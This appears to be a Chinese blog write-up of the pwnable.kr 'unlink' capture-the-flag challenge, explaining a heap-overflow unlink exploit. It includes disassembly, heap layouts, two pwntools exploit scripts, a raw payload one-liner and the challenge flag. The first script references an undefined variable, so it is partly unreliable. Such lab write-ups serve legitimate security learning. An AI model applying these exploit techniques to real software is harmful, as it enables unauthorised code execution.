unlink
pwnable.kr 中简单的堆溢出利用。 堆溢出的原理:用精心构造的数据去溢出下一个堆块的块首,改写堆块的前向指针和后向指针,然后再分配、释放、合并等操作发生时伺机获取一次向内存任意地址写入任意数据的机会。
连接服务器。 1
ssh unlink@pwnable.kr -p2222 (pw: guest)
查看可执行文件unlink
1
2
3
4
5
6
7
8unlink@ubuntu:~$ checksec unlink
[*] '/home/unlink/unlink'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE
1 | #include <stdio.h> |
查看源码,可以发现,给A赋值时使用了gets
函数,存在溢出B堆和C堆的可能,并在gets函数后调用了unlink(B)
,而unlink()
函数模拟了堆溢出后free
造成的任意地址写操作,即0day安全中提到的DWROD SHOOT
,存在unlink漏洞。并且源程序给出了shell函数,此函数地址可以作为shellcode的地址。
1 | info functions |
shell函数的地址:0x080484eb
。
unlink(B)完成的操作为:
B->fd->bk = B->bk
B->bk->fd = B->fd
如果要利用unlink来覆盖返回地址,则堆B在内存中的布局应该是这样的
+-------------------+-------------------+
|stack[return addr] | addr shell |
+-------------------+-------------------+
| padding |
+---------------------------------------+
如果这么构造,这里有问题。 -
shell函数的地址在代码段,代码段是没有写权限的,所以在执行B->bk->fd = B->fd
会报错。所以B->fd
,B->bk
必须指向可读可写的内存。
所以必须两个地址都要可写。 查看汇编代码,main中存在这么几行代码:
1
2
3
4
5
6
70x080485f2 <+195>: call 0x8048504 <unlink>
0x080485f7 <+200>: add $0x10,%esp
0x080485fa <+203>: mov $0x0,%eax
0x080485ff <+208>: mov -0x4(%ebp),%ecx
0x08048602 <+211>: leave
0x08048603 <+212>: lea -0x4(%ecx),%esp
0x08048606 <+215>: ret 1
2mov esp,ebp
pop ebp1
2
3
4
5mov -0x4(%ebp),%ecx
mov %ebp,%esp
pop %ebp
lea -0x4(%ecx),%esp
ret
ret
指令的作用是栈顶元素出栈,即%esp
,其值赋给%eip
寄存器。
从上面可以逆向分析到,存在以下一个关系:
%ecx <= %ebp-0x4
%esp <= %ecx-0x4
我们可以将shellcode+0x4地址写入%ebp-0x4中,达到跳转的目的。
通过逆向可知,&A,&B,&C的地址在栈上,分别为 %ebp-0x14,
%ebp-0x10, %ebp-0xc。 1
2
3
4
5
6
7
8
9
10
11
12
13
14
150x08048555 <+38>: call 0x80483a0 <malloc@plt>
0x0804855a <+43>: add $0x10,%esp
0x0804855d <+46>: mov %eax,-0x14(%ebp)
0x08048560 <+49>: sub $0xc,%esp
0x08048563 <+52>: push $0x10
0x08048565 <+54>: call 0x80483a0 <malloc@plt>
0x0804856a <+59>: add $0x10,%esp
0x0804856d <+62>: mov %eax,-0xc(%ebp)
0x08048570 <+65>: sub $0xc,%esp
0x08048573 <+68>: push $0x10
0x08048575 <+70>: call 0x80483a0 <malloc@plt>
0x0804857a <+75>: add $0x10,%esp
0x0804857d <+78>: mov %eax,-0x10(%ebp)
0x08048580 <+81>: mov -0x14(%ebp),%eax&A
=%ebp-0x14,则可控制的栈地址为%ebp-0x4,可控的栈地址为&A+0x10
。
我们将shellcode的地址写入&A+0x10
。
通过GDB分析,将断点设在0x080485f2 <+195>: call 0x8048504 <unlink>
上,可以观察内存中堆的变化。
只要能够修改ESP寄存器的内容修改为shellcode的地址就能够执行shellcode。也就是说,利用堆溢出控制栈数据,这里采用unlink的DWORD SHOOT技术。
划出堆中简略布局图。
+-------------------+-------------------+ <- [A]
| FD | BK |
+-------------------+-------------------+ <- [A->buf]
| shellcode | AAAA |
+---------------------------------------+
| AAAAAAAA |
+---------------------------------------+ <- [B]
| fd1 | bk2 |
+-------------------+-------------------+
可以利用BK->fd=FD
得到以下布局,
+-------------------+-------------------+ <- [A]
| FD | BK |
+-------------------+-------------------+ <- [A->buf]
| shell addr | 'aaaa' |
+---------------------------------------+
| 'aaaaaaaa' |
+---------------------------------------+ <- [B]
| A + 12 | &A + 16 |
+-------------------+-------------------+
或者利用FD->bk=BK
得到以下布局
+-------------------+-------------------+ <- [A]
| FD | BK |
+-------------------+-------------------+ <- [A->buf]
| shell addr | 'aaaa' |
+---------------------------------------+
| 'aaaaaaaa' |
+---------------------------------------+ <- [B]
| &A + 12 | A + 12 |
+-------------------+-------------------+
漏洞利用代码 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34# -*- coding: utf-8 -*-
from pwn import *
#context(log_level="debug")
s = ssh(host='pwnable.kr',
port=2222,
user='unlink',
password='guest'
)
p = s.process("./unlink")
p.recvuntil("here is stack address leak: ")
stack_addr = int(p.recv(10),16)
p.recvuntil("here is heap address leak: ")
heap_addr = int(p.recv(9),16)
p.recvuntil("now that you have leaks, get shell!\n")
shell_func_addr = 0x080484eb
padding = 'A'*12
#方法一
fdB = heap_addr + 12
bkB = stack_addr + 16
'''
#方法二
或者交换位置,但要重新计算偏移值
bkB = heap_addr + 12
fdB = stack_addr + 12
'''
payload = p32(shell_buf) + padding + p32(fdB) + p32(bkB)
p.sendline(payload)
p.interactive()
等待连接成功后,顺利拿到shell。 1
2$ $ cat flag
conditional_write_what_where_from_unl1nk_explo1t1
2
3
4
5
6
7
8
9
10
11
12
13
14
15from pwn import *
context.arch = 'i386' # i386 / arm
r = process(['/home/unlink/unlink'])
leak = r.recvuntil('shell!\n')
stack = int(leak.split('leak: 0x')[1][:8], 16)
heap = int(leak.split('leak: 0x')[2][:8], 16)
shell = 0x80484eb
payload = pack(shell) # heap + 8 (new ret addr)
payload += pack(heap + 12) # heap + 12 (this -4 becomes ESP at ret)
payload += '3333' # heap + 16
payload += '4444'
payload += pack(stack - 0x20) # eax. (address of old ebp of unlink) -4
payload += pack(heap + 16) # edx.
r.sendline( payload )
r.interactive()
PS,没有成功的方法:
打开两个终端,第一个终端利用三个cat
命令,等待读取/tmp/payloadsss
中数据,
1
2
3
4
5
6unlink@ubuntu:~$ (cat -; cat /tmp/payloadsss; cat -) | ./unlink
here is stack address leak: 0xffdfd8e4
here is heap address leak: 0x99c8410
now that you have leaks, get shell!1
unlink@ubuntu:~$ python -c "print '\xeb\x84\x04\x08'+'A'*12+ '\x1c\x84\x9c\x09' + '\xf4\xd8\xdf\xff' " > /tmp/payloadsss
ctrl+D
。
-^-很可惜,我没有成功。
总结:
- 经典的unlink是通过改写got表中的free地址为我们的shellcode的地址,这里也没有用到free函数。
- 汇编语言leave是mov esp, ebp pop ebp
- pwntools中的API使用,ssh,process,remote等。
- 堆溢出的原理:用精心构造的数据去溢出下一个堆块的块首,改写堆块的前向指针和后向指针,然后再分配、释放、合并等操作发生时司机获取一次向内存任意地址写入任意数据的机会。
参考资料
[1] Unlink - Pwnable.kr [2] 全面剖析Pwnable.kr unlink [3] pwnable.kr之初探unlink